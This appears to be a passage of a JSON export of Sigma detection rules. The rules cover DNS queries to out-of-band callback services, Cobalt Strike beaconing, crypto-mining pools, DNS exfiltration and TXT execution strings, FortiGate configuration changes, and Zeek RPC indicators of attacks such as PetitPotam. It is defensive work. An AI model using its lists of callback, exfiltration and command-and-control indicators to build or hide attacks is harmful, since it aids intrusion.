    "content": "title: DNS Query to External Service Interaction Domains\nid: aff715fa-4dd5-497a-8db3-910bea555566\nstatus: test\ndescription: |\n    Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE\nreferences:\n    - https://twitter.com/breakersall/status/1533493587828260866\n    - https://www.bitdefender.com/en-us/blog/businessinsights/bitdefender-advisory-critical-unauthenticated-rce-windows-server-update-services-cve-2025-59287\n    - https://github.com/SigmaHQ/sigma/pull/5724#issuecomment-3466382234\nauthor: Florian Roth (Nextron Systems), Matt Kelly (list of domains)\ndate: 2022-06-07\nmodified: 2026-01-24\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.reconnaissance\n    - attack.t1595.002\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query|endswith:\n            - '.burpcollaborator.net' # Portswigger Burpsuite Collaborator\n            - '.canarytokens.com' # Thinkst Canary Canarytokens\n            - '.ceye.io'\n            - '.ddns.1443.eu.org' # dig.pm\n            - '.ddns.bypass.eu.org' # dig.pm\n            - '.ddns.xn--gg8h.eu.org' # dig.pm\n            - '.digimg.store' # dnslog.ink\n            - '.dns.su18.org' # javaweb.org\n            - '.dnshook.site' # webhook.site\n            - '.dnslog.cn'\n            - '.dnslog.ink' # dnslog.ink\n            - '.instances.httpworkbench.com' # httpworkbench.com\n            - '.interact.sh' # Project Discovery Interactsh\n            - '.log.dnslog.pp.ua' # dnslog.org\n            - '.log.dnslog.qzz.io' # dnslog.org\n            - '.log.dnslogs.dpdns.org' # dnslog.org\n            - '.log.javaweb.org' # javaweb.org\n            - '.log.nat.cloudns.ph' # dnslog.org\n            - '.oast.fun' # Project Discovery Interactsh\n            - '.oast.live' # Project Discovery Interactsh\n            - '.oast.me' # Project Discovery Interactsh\n            - '.oast.online' # Project Discovery Interactsh\n            - '.oast.pro' # Project Discovery Interactsh\n            - '.oast.site' # Project Discovery Interactsh\n            - '.oastify.com' # Portswigger Burpsuite Collaborator\n            - '.p8.lol' # javaweb.org\n            - '.requestbin.net'\n    filter_main_polling:\n        query|contains: 'polling.oastify.com'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate security scanning.\nlevel: high\n"
  },
  {
    "path": "rules/network/dns/net_dns_mal_cobaltstrike.yml",
    "content": "title: Cobalt Strike DNS Beaconing\nid: 2975af79-28c4-4d2f-a951-9095f229df29\nstatus: test\ndescription: Detects suspicious DNS queries known from Cobalt Strike beacons\nreferences:\n    - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns\n    - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-05-10\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection1:\n        query|startswith:\n            - 'aaa.stage.'\n            - 'post.1'\n    selection2:\n        query|contains: '.stage.123456.'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml",
    "content": "title: Monero Crypto Coin Mining Pool Lookup\nid: b593fd50-7335-4682-a36c-4edcb68e4641\nstatus: stable\ndescription: Detects suspicious DNS queries to Monero mining pools\nreferences:\n    - https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-24\ntags:\n    - attack.impact\n    - attack.t1496\n    - attack.exfiltration\n    - attack.t1567\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query|contains:\n            - 'pool.minexmr.com'\n            - 'fr.minexmr.com'\n            - 'de.minexmr.com'\n            - 'sg.minexmr.com'\n            - 'ca.minexmr.com'\n            - 'us-west.minexmr.com'\n            - 'pool.supportxmr.com'\n            - 'mine.c3pool.com'\n            - 'xmr-eu1.nanopool.org'\n            - 'xmr-eu2.nanopool.org'\n            - 'xmr-us-east1.nanopool.org'\n            - 'xmr-us-west1.nanopool.org'\n            - 'xmr-asia1.nanopool.org'\n            - 'xmr-jp1.nanopool.org'\n            - 'xmr-au1.nanopool.org'\n            - 'xmr.2miners.com'\n            - 'xmr.hashcity.org'\n            - 'xmr.f2pool.com'\n            - 'xmrpool.eu'\n            - 'pool.hashvault.pro'\n    condition: selection\nfalsepositives:\n    - Legitimate crypto coin mining\nlevel: high\n"
  },
  {
    "path": "rules/network/dns/net_dns_susp_b64_queries.yml",
    "content": "title: Suspicious DNS Query with B64 Encoded String\nid: 4153a907-2451-4e4f-a578-c52bb6881432\nstatus: test\ndescription: Detects suspicious DNS queries using base64 encoding\nreferences:\n    - https://github.com/krmaxwell/dns-exfiltration\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-05-10\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - attack.command-and-control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query|contains: '==.'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/network/dns/net_dns_susp_telegram_api.yml",
    "content": "title: Telegram Bot API Request\nid: c64c5175-5189-431b-a55e-6d9882158251\nstatus: test\ndescription: Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind\nreferences:\n    - https://core.telegram.org/bots/faq\n    - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\n    - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/\n    - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-06-05\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1102.002\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query: 'api.telegram.org'   # Telegram Bot API Request https://core.telegram.org/bots/faq\n    condition: selection\nfalsepositives:\n    - Legitimate use of Telegram bots in the company\nlevel: medium\n"
  },
  {
    "path": "rules/network/dns/net_dns_susp_txt_exec_strings.yml",
    "content": "title: DNS TXT Answer with Possible Execution Strings\nid: 8ae51330-899c-4641-8125-e39f2e07da72\nstatus: test\ndescription: Detects strings used in command execution in DNS TXT Answer\nreferences:\n    - https://twitter.com/stvemillertime/status/1024707932447854592\n    - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1\nauthor: Markus Neis\ndate: 2018-08-08\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection:\n        record_type: 'TXT'\n        answer|contains:\n            - 'IEX'\n            - 'Invoke-Expression'\n            - 'cmd.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/dns/net_dns_wannacry_killswitch_domain.yml",
    "content": "title: WannaCry Killswitch Domain\nid: 3eaf6218-3bed-4d8a-8707-274096f12a18\nstatus: test\ndescription: Detects DNS queries for the WannaCry killswitch domains\nreferences:\n    - https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign\nauthor: Mike Wade\ndate: 2020-09-16\nmodified: 2022-03-24\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query:\n            - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.testing'\n            - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.test'\n            - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com'\n            - 'ayylmaotjhsstasdfasdfasdfasdfasdfasdfasdf.com'\n            - 'iuqssfsodp9ifjaposdfjhgosurijfaewrwergwea.com'\n    condition: selection\nfalsepositives:\n    - Analyst testing\nlevel: high\n"
  },
  {
    "path": "rules/network/firewall/net_firewall_cleartext_protocols.yml",
    "content": "title: Cleartext Protocol Usage\nid: d7fb8f0e-bd5f-45c2-b467-19571c490d7e\nstatus: stable\ndescription: |\n    Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\n    Ensure that encryption is used for all sensitive information in transit. Ensure that an encrypted channel is used for all administrative account access.\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\nauthor: Alexandr Yampolskyi, SOC Prime, Tim Shelton\ndate: 2019-03-26\nmodified: 2022-10-10\ntags:\n    - attack.credential-access\n    # - CSC4\n    # - CSC4.5\n    # - CSC14\n    # - CSC14.4\n    # - CSC16\n    # - CSC16.5\n    # - NIST CSF 1.1 PR.AT-2\n    # - NIST CSF 1.1 PR.MA-2\n    # - NIST CSF 1.1 PR.PT-3\n    # - NIST CSF 1.1 PR.AC-1\n    # - NIST CSF 1.1 PR.AC-4\n    # - NIST CSF 1.1 PR.AC-5\n    # - NIST CSF 1.1 PR.AC-6\n    # - NIST CSF 1.1 PR.AC-7\n    # - NIST CSF 1.1 PR.DS-1\n    # - NIST CSF 1.1 PR.DS-2\n    # - ISO 27002-2013 A.9.2.1\n    # - ISO 27002-2013 A.9.2.2\n    # - ISO 27002-2013 A.9.2.3\n    # - ISO 27002-2013 A.9.2.4\n    # - ISO 27002-2013 A.9.2.5\n    # - ISO 27002-2013 A.9.2.6\n    # - ISO 27002-2013 A.9.3.1\n    # - ISO 27002-2013 A.9.4.1\n    # - ISO 27002-2013 A.9.4.2\n    # - ISO 27002-2013 A.9.4.3\n    # - ISO 27002-2013 A.9.4.4\n    # - ISO 27002-2013 A.8.3.1\n    # - ISO 27002-2013 A.9.1.1\n    # - ISO 27002-2013 A.10.1.1\n    # - PCI DSS 3.2 2.1\n    # - PCI DSS 3.2 8.1\n    # - PCI DSS 3.2 8.2\n    # - PCI DSS 3.2 8.3\n    # - PCI DSS 3.2 8.7\n    # - PCI DSS 3.2 8.8\n    # - PCI DSS 3.2 1.3\n    # - PCI DSS 3.2 1.4\n    # - PCI DSS 3.2 4.3\n    # - PCI DSS 3.2 7.1\n    # - PCI DSS 3.2 7.2\n    # - PCI DSS 3.2 7.3\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        dst_port:\n            - 8080\n            - 21\n            - 80\n            - 23\n            - 50000\n            - 1521\n            - 27017\n            - 3306\n            - 1433\n            - 11211\n            - 15672\n            - 5900\n            - 5901\n            - 5902\n            - 5903\n            - 5904\n    selection_allow1:\n        action:\n            - forward\n            - accept\n            - 2\n    selection_allow2:\n        blocked: \"false\" # not all fws set action value, but are set to mark as blocked or allowed or not\n    condition: selection and 1 of selection_allow*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_admin_account_created.yml",
    "content": "title: FortiGate - New Administrator Account Created\nid: cd0a4943-0edd-42cf-b50c-06f77a10d4c1\nstatus: experimental\ndescription: Detects the creation of an administrator account on a Fortinet FortiGate Firewall.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/390485493/config-system-admin\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Add'\n        cfgpath: 'system.admin'\n    condition: selection\nfalsepositives:\n    - An administrator account can be created for legitimate purposes. Investigate the account details to determine if it is authorized.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_address_object.yml",
    "content": "title: FortiGate - Firewall Address Object Added\nid: 5c8d7b41-3812-432f-a0bb-4cfb7c31827e\nstatus: experimental\ndescription: Detects the addition of firewall address objects on a Fortinet FortiGate Firewall.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/306021697/config-firewall-address\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Add'\n        cfgpath: 'firewall.address'\n    condition: selection\nfalsepositives:\n    - An address could be added or deleted for legitimate purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_policy_added.yml",
    "content": "title: FortiGate - New Firewall Policy Added\nid: f24ab7a8-f09a-4319-82c1-915586aa642b\nstatus: experimental\ndescription: Detects the addition of a new firewall policy on a Fortinet FortiGate Firewall.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/333889629/config-firewall-policy\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Add'\n        cfgpath: 'firewall.policy'\n    condition: selection\nfalsepositives:\n    - A firewall policy can be added for legitimate purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_local_user_created.yml",
    "content": "title: FortiGate - New Local User Created\nid: ddbbe845-1d74-43a8-8231-2156d180234d\nstatus: experimental\ndescription: |\n    Detects the creation of a new local user on a Fortinet FortiGate Firewall.\n    The new local user could be used for VPN connections.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/109120963/config-user-local\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Add'\n        cfgpath: 'user.local'\n    condition: selection\nfalsepositives:\n    - A local user can be created for legitimate purposes. Investigate the user details to determine if it is authorized.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_vpn_ssl_web_portal.yml",
    "content": "title: FortiGate - New VPN SSL Web Portal Added\nid: 2bfb6216-0c31-4d20-8501-2629b29a3fa2\nstatus: experimental\ndescription: |\n    Detects the addition of a VPN SSL Web Portal on a Fortinet FortiGate Firewall.\n    This behavior was observed together with the modification of VPN SSL settings.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/113121765/config-vpn-ssl-web-portal\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Add'\n        cfgpath: 'vpn.ssl.web.portal'\n    condition: selection\nfalsepositives:\n    - A VPN SSL Web Portal can be added for legitimate purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_user_group_modified.yml",
    "content": "title: FortiGate - User Group Modified\nid: 69ffc84e-8b1a-4024-8351-e018f66b8275\nstatus: experimental\ndescription: |\n    Detects the modification of a user group on a Fortinet FortiGate Firewall.\n    The group could be used to grant VPN access to a network.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/328136827/config-user-group\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    # - attack.t1098.007\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Edit'\n        cfgpath: 'user.group'\n    condition: selection\nfalsepositives:\n    - A group can be modified for legitimate purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_vpn_ssl_settings_modified.yml",
    "content": "title: FortiGate - VPN SSL Settings Modified\nid: 8b5dacf2-aeb7-459d-b133-678eb696d410\nstatus: experimental\ndescription: |\n    Detects the modification of VPN SSL Settings (for example, the modification of authentication rules).\n    This behavior was observed together with the addition of a VPN SSL Web Portal.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/114404382/config-vpn-ssl-settings\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44546/44546-logid-event-config-attr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Edit'\n        cfgpath: 'vpn.ssl.settings'\n    condition: selection\nfalsepositives:\n    - VPN SSL settings can be changed for legitimate purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/network/huawei/bgp/huawei_bgp_auth_failed.yml",
    "content": "title: Huawei BGP Authentication Failures\nid: a557ffe6-ac54-43d2-ae69-158027082350\nstatus: test\ndescription: Detects BGP authentication failures, which may be indicative of brute force attacks to manipulate routing.\nreferences:\n    - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf\nauthor: Tim Brown\ndate: 2023-01-09\nmodified: 2023-01-23\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.collection\n    - attack.t1078\n    - attack.t1110\n    - attack.t1557\nlogsource:\n    product: huawei\n    service: bgp\n    definition: 'Requirements: huawei bgp logs need to be enabled and ingested'\ndetection:\n    keywords_bgp_huawei:\n        '|all':\n            - ':179' # Protocol\n            - 'BGP_AUTH_FAILED'\n    condition: keywords_bgp_huawei\nfalsepositives:\n    - Unlikely, except due to misconfigurations\nlevel: low\n"
  },
  {
    "path": "rules/network/juniper/bgp/juniper_bgp_missing_md5.yml",
    "content": "title: Juniper BGP Missing MD5\nid: a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43\nstatus: test\ndescription: Detects Juniper BGP sessions with a missing MD5 digest, which may be indicative of brute force attacks to manipulate routing.\nreferences:\n    - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf\nauthor: Tim Brown\ndate: 2023-01-09\nmodified: 2023-01-23\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.collection\n    - attack.t1078\n    - attack.t1110\n    - attack.t1557\nlogsource:\n    product: juniper\n    service: bgp\n    definition: 'Requirements: juniper bgp logs need to be enabled and ingested'\ndetection:\n    keywords_bgp_juniper:\n        '|all':\n            - ':179' # Protocol\n            - 'missing MD5 digest'\n    condition: keywords_bgp_juniper\nfalsepositives:\n    - Unlikely, except due to misconfigurations\nlevel: low\n"
  },
  {
    "path": "rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml",
    "content": "title: MITRE BZAR Indicators for Execution\nid: b640c0b8-87f8-4daa-aef8-95a24261dd1d\nstatus: test\ndescription: 'Windows DCE-RPC functions which indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.'\nreferences:\n    - https://github.com/mitre-attack/bzar#indicators-for-attck-execution\nauthor: '@neu5ron, SOC Prime'\ndate: 2020-03-19\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1047\n    - attack.t1053.002\n    - attack.t1569.002\nlogsource:\n    product: zeek\n    service: dce_rpc\ndetection:\n    op1:\n        endpoint: 'JobAdd'\n        operation: 'atsvc'\n    op2:\n        endpoint: 'ITaskSchedulerService'\n        operation: 'SchRpcEnableTask'\n    op3:\n        endpoint: 'ITaskSchedulerService'\n        operation: 'SchRpcRegisterTask'\n    op4:\n        endpoint: 'ITaskSchedulerService'\n        operation: 'SchRpcRun'\n    op5:\n        endpoint: 'IWbemServices'\n        operation: 'ExecMethod'\n    op6:\n        endpoint: 'IWbemServices'\n        operation: 'ExecMethodAsync'\n    op7:\n        endpoint: 'svcctl'\n        operation: 'CreateServiceA'\n    op8:\n        endpoint: 'svcctl'\n        operation: 'CreateServiceW'\n    op9:\n        endpoint: 'svcctl'\n        operation: 'StartServiceA'\n    op10:\n        endpoint: 'svcctl'\n        operation: 'StartServiceW'\n    condition: 1 of op*\nfalsepositives:\n    - Windows administrator tasks or troubleshooting\n    - Windows management scripts or software\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml",
    "content": "title: MITRE BZAR Indicators for Persistence\nid: 53389db6-ba46-48e3-a94c-e0f2cefe1583\nstatus: test\ndescription: 'Windows DCE-RPC functions which indicate persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.'\nreferences:\n    - https://github.com/mitre-attack/bzar#indicators-for-attck-persistence\nauthor: '@neu5ron, SOC Prime'\ndate: 2020-03-19\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.004\nlogsource:\n    product: zeek\n    service: dce_rpc\ndetection:\n    op1:\n        endpoint: 'spoolss'\n        operation: 'RpcAddMonitor'\n    op2:\n        endpoint: 'spoolss'\n        operation: 'RpcAddPrintProcessor'\n    op3:\n        endpoint: 'IRemoteWinspool'\n        operation: 'RpcAsyncAddMonitor'\n    op4:\n        endpoint: 'IRemoteWinspool'\n        operation: 'RpcAsyncAddPrintProcessor'\n    op5:\n        endpoint: 'ISecLogon'\n        operation: 'SeclCreateProcessWithLogonW'\n    op6:\n        endpoint: 'ISecLogon'\n        operation: 'SeclCreateProcessWithLogonExW'\n    condition: 1 of op*\nfalsepositives:\n    - Windows administrator tasks or troubleshooting\n    - Windows management scripts or software\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml",
    "content": "title: Potential PetitPotam Attack Via EFS RPC Calls\nid: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a\nstatus: test\ndescription: |\n    Detects usage of the Windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack referred to as PetitPotam.\n    The usage of this RPC function should be rare, if it is ever used at all.\n    Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n    View surrounding logs (within a few minutes before and after) from the Source IP. Logs from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc.\nreferences:\n    - https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp\n    - https://msrc.microsoft.com/update-guide/vulnerability/ADV210003\n    - https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf\n    - https://threatpost.com/microsoft-petitpotam-poc/168163/\nauthor: '@neu5ron, @Antonlovesdnb, Mike Remen'\ndate: 2021-08-17\nmodified: 2022-11-28\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1557.001\n    - attack.t1187\nlogsource:\n    product: zeek\n    service: dce_rpc\ndetection:\n    selection:\n        operation|startswith: 'efs'\n    condition: selection\nfalsepositives:\n    - Uncommon but legitimate Windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml",
    "content": "title: SMB Spoolss Named Pipe Usage\nid: bae2865c-5565-470d-b505-9496c87d0c30\nstatus: test\ndescription: Detects the use of the spoolss named pipe over SMB. This can be used to trigger NTLM authentication from any machine that has the print spooler service enabled.\nreferences:\n    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n    - https://dirkjanm.io/a-different-way-of-abusing-zerologon/\n    - https://twitter.com/_dirkjan/status/1309214379003588608\nauthor: OTR (Open Threat Research), @neu5ron\ndate: 2018-11-28\nmodified: 2022-10-09\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        path|endswith: 'IPC$'\n        name: spoolss\n    condition: selection\nfalsepositives:\n    - Domain Controllers that also act as print servers (common, although they should not)\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_default_cobalt_strike_certificate.yml",
    "content": "title: Default Cobalt Strike Certificate\nid: 7100f7e3-92ce-4584-b7b7-01b40d3d4118\nstatus: test\ndescription: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic\nreferences:\n    - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468\nauthor: Bhabesh Raj\ndate: 2021-06-23\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.s0154\nlogsource:\n    product: zeek\n    service: x509\ndetection:\n    selection:\n        certificate.serial: 8BB00EE\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_dns_kerberos_coercion_via_dns_object_spn_spoofing.yml",
    "content": "title: Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing - Network\nid: 5588576c-5898-4fac-bcdd-7475a60e8f43\nrelated:\n    - id: b07e58cf-cacc-4135-8473-ccb2eba63dd2 # Potential Kerberos Coercion via DNS Object Spoofing\n      type: similar\n    - id: e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c # Suspicious DNS Query Indicating Kerberos Coercion via DNS Object Spoofing\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing.\n    The pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\n    Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\n    It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\n    to spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.\nreferences:\n    - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025\n    - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-20\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1557.001\n    - attack.t1187\nlogsource:\n    product: zeek\n    service: dns\ndetection:\n    selection:\n        query|contains|all:\n            - 'UWhRCA' # Follows this pattern UWhRCAAAAA..BAAA\n            - 'BAAAA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_dns_mining_pools.yml",
    "content": "title: DNS Events Related To Mining Pools\nid: bf74135c-18e8-4a72-a926-0e4f47888c19\nstatus: test\ndescription: Identifies clients that may be performing DNS lookups associated with common currency mining pools.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml\nauthor: Saw Winn Naung, Azure-Sentinel, @neu5ron\ndate: 2021-08-19\nmodified: 2022-07-07\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.impact\n    - attack.t1496\nlogsource:\n    service: dns\n    product: zeek\ndetection:\n    selection:\n        query|endswith:\n            - 'monerohash.com'\n            - 'do-dear.com'\n            - 'xmrminerpro.com'\n            - 'secumine.net'\n            - 'xmrpool.com'\n            - 'minexmr.org'\n            - 'hashanywhere.com'\n            - 'xmrget.com'\n            - 'mininglottery.eu'\n            - 'minergate.com'\n            - 'moriaxmr.com'\n            - 'multipooler.com'\n            - 'moneropools.com'\n            - 'xmrpool.eu'\n            - 'coolmining.club'\n            - 'supportxmr.com'\n            - 'minexmr.com'\n            - 'hashvault.pro'\n            - 'xmrpool.net'\n            - 'crypto-pool.fr'\n            - 'xmr.pt'\n            - 'miner.rocks'\n            - 'walpool.com'\n            - 'herominers.com'\n            - 'gntl.co.uk'\n            - 'semipool.com'\n            - 'coinfoundry.org'\n            - 'cryptoknight.cc'\n            - 'fairhash.org'\n            - 